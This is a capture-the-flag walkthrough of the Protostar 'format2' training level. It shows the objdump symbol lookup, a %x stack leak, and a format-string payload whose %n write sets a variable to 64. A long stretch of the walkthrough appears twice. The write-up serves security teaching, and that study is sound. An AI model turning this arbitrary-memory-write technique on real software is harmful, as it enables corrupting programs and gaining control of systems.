Protostar 0x12 Format2
Prev: 0x11 - Format1
Next: 0x13 - Format3
This level asks us to leverage the arbitrary write technique from the prior level to write a specific value - "64" in this case - into memory.
Let's first use objdump to determine the location of our "target" variable, which we know must reside somewhere in the BSS segment.
$ objdump -t /opt/protostar/bin/format2
/opt/protostar/bin/format2: file format elf32-i386
SYMBOL TABLE:
08048114 l d .interp 00000000 .interp
08048128 l d .note.ABI-tag 00000000 .note.ABI-tag
...
080496d8 g O .bss 00000004 stdin@@GLIBC_2.0
080496e4 g O .bss 00000004 target
So, our target resides at 0x80496e4. Let's now try to locate our input string on the stack. We'll enter "AAAA" and print 10 pointers from the stack, searching for "41414141" which would indicate the start of our string.
$ python -c 'print "A" * 4 + "%x "*10' | /opt/protostar/bin/format2
AAAA200 b7fd8420 bffff5e4 41414141 25207825 78252078 20782520 25207825 78252078 20782520
Well, that's much more convenient than last time! We only need to provide three other modifiers before the %n modifier to point "printf" to the start of our string. If we replace "AAAA" with the address of target, when we provide %n as the fourth argument for "printf" it will write to "target!"
To break it down more clearly, here is our payload:
Next: 0x13 - Format3
This level asks us to leverage the arbitrary write technique from the prior level to write a specific value - "64" in this case - into memory.
Let's first use objdump to determine the location of our "target" variable, which we know must reside somewhere in the BSS segment.
$ objdump -t /opt/protostar/bin/format2
/opt/protostar/bin/format2: file format elf32-i386
SYMBOL TABLE:
08048114 l d .interp 00000000 .interp
08048128 l d .note.ABI-tag 00000000 .note.ABI-tag
...
080496d8 g O .bss 00000004 stdin@@GLIBC_2.0
080496e4 g O .bss 00000004 target
So, our target resides at 0x80496e4. Let's now try to locate our input string on the stack. We'll enter "AAAA" and print 10 pointers from the stack, searching for "41414141" which would indicate the start of our string.
$ python -c 'print "A" * 4 + "%x "*10' | /opt/protostar/bin/format2
AAAA200 b7fd8420 bffff5e4 41414141 25207825 78252078 20782520 25207825 78252078 20782520
Well, that's much more convenient than last time! We only need to provide three other modifiers before the %n modifier to point "printf" to the start of our string. If we replace "AAAA" with the address of target, when we provide %n as the fourth argument for "printf" it will write to "target!"
To break it down more clearly, here is our payload:
- The address of target: 0x80496e4
- Three dummy modifiers so that "printf" points to the start of our string. We will use %x
- A dummy buffer to bring the total characters written thus far up to 64 (length TBD)
- %n to trigger the write
We'll start with 30 As and see what "target" is set to:
$ python -c 'print "\xe4\x96\x04\x08" + "%x" * 3 + "A" * 30 + "%n"' | /opt/protostar/bin/format2
200b7fd8420bffff5e4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
target is 53 :(
"target" became 53, so let's add 11 As to bring it up to 64! Our final input:
$ python -c 'print "\xe4\x96\x04\x08" + "%x" * 3 + "A" * 41 + "%n"' | /opt/protostar/bin/format2
200b7fd8420bffff5e4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
you have modified the target :)
Success!